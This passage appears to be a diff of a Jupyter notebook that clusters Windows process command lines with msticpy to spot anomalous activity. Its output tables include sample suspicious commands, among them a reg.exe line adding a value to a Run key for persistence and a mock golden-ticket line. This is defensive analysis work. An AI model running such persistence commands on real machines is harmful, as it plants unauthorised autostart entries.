+       "      <td>3478</td>\n",
+       "      <td>True</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>2019-01-15 04:16:24.027</td>\n",
+       "      <td>2019-01-15 05:24:24.023</td>\n",
+       "      <td>C:\\Windows\\System32\\conhost.exe</td>\n",
+       "      <td>\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1</td>\n",
+       "      <td>39</td>\n",
+       "      <td>10</td>\n",
+       "      <td>3028</td>\n",
+       "      <td>True</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>2019-01-15 04:15:26.000</td>\n",
+       "      <td>2019-01-15 05:24:26.010</td>\n",
+       "      <td>C:\\Windows\\System32\\cscript.exe</td>\n",
+       "      <td>\"C:\\Windows\\system32\\cscript.exe\" /nologo \"MonitorKnowledgeDiscovery.vbs\"</td>\n",
+       "      <td>71</td>\n",
+       "      <td>13</td>\n",
+       "      <td>3022</td>\n",
+       "      <td>True</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ]
+     },
+     "metadata": {}
+    }
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 5,
+   "source": [
+    "# Look at clusters for individual process names\n",
+    "def view_cluster(exe_name):\n",
+    "    display(clus_events[['ClusterSize', 'processName', 'CommandLine', 'ClusterId']][clus_events['processName'] == exe_name])\n",
+    "view_cluster('reg.exe')"
+   ],
+   "outputs": [
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/plain": [
+       "    ClusterSize processName  \\\n",
+       "46            1     reg.exe   \n",
+       "56            3     reg.exe   \n",
+       "\n",
+       "                                                           CommandLine  \\\n",
+       "46  .\\reg  not /domain:everything that /sid:shines is /krbtgt:golden !   \n",
+       "56   .\\reg.exe  add \\hkcu\\software\\microsoft\\some\\key\\Run /v abadvalue   \n",
+       "\n",
+       "    ClusterId  \n",
+       "46         -1  \n",
+       "56          7  "
+      ],
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>ClusterSize</th>\n",
+       "      <th>processName</th>\n",
+       "      <th>CommandLine</th>\n",
+       "      <th>ClusterId</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>46</th>\n",
+       "      <td>1</td>\n",
+       "      <td>reg.exe</td>\n",
+       "      <td>.\\reg  not /domain:everything that /sid:shines is /krbtgt:golden !</td>\n",
+       "      <td>-1</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>56</th>\n",
+       "      <td>3</td>\n",
+       "      <td>reg.exe</td>\n",
+       "      <td>.\\reg.exe  add \\hkcu\\software\\microsoft\\some\\key\\Run /v abadvalue</td>\n",
+       "      <td>7</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ]
+     },
+     "metadata": {}
+    }
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 6,
+   "source": [
+    "# Show all clustered processes\n",
+    "from msticpy.analysis.eventcluster import plot_cluster\n",
+    "# Create label with unqualified path\n",
+    "labelled_df = processes_on_host.copy()\n",
+    "labelled_df['label'] = labelled_df.apply(lambda x: x.NewProcessName.split(\"\\\\\")[-1], axis=1)\n",
+    "\n",
+    "%matplotlib inline\n",
+    "#%matplotlib notebook\n",
+    "plt.rcParams['figure.figsize'] = (15,10)\n",
+    "plot_cluster(dbcluster, labelled_df, x_data, plot_label='label', plot_features=[0,1], verbose=False, cut_off=3,\n",
+    "             xlabel='CmdLine Tokens', ylabel='Path Score');\n"
+   ],
+   "outputs": [
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/plain": [
+       "<Figure size 1080x720 with 1 Axes>"
+      ],
+      "image/png": "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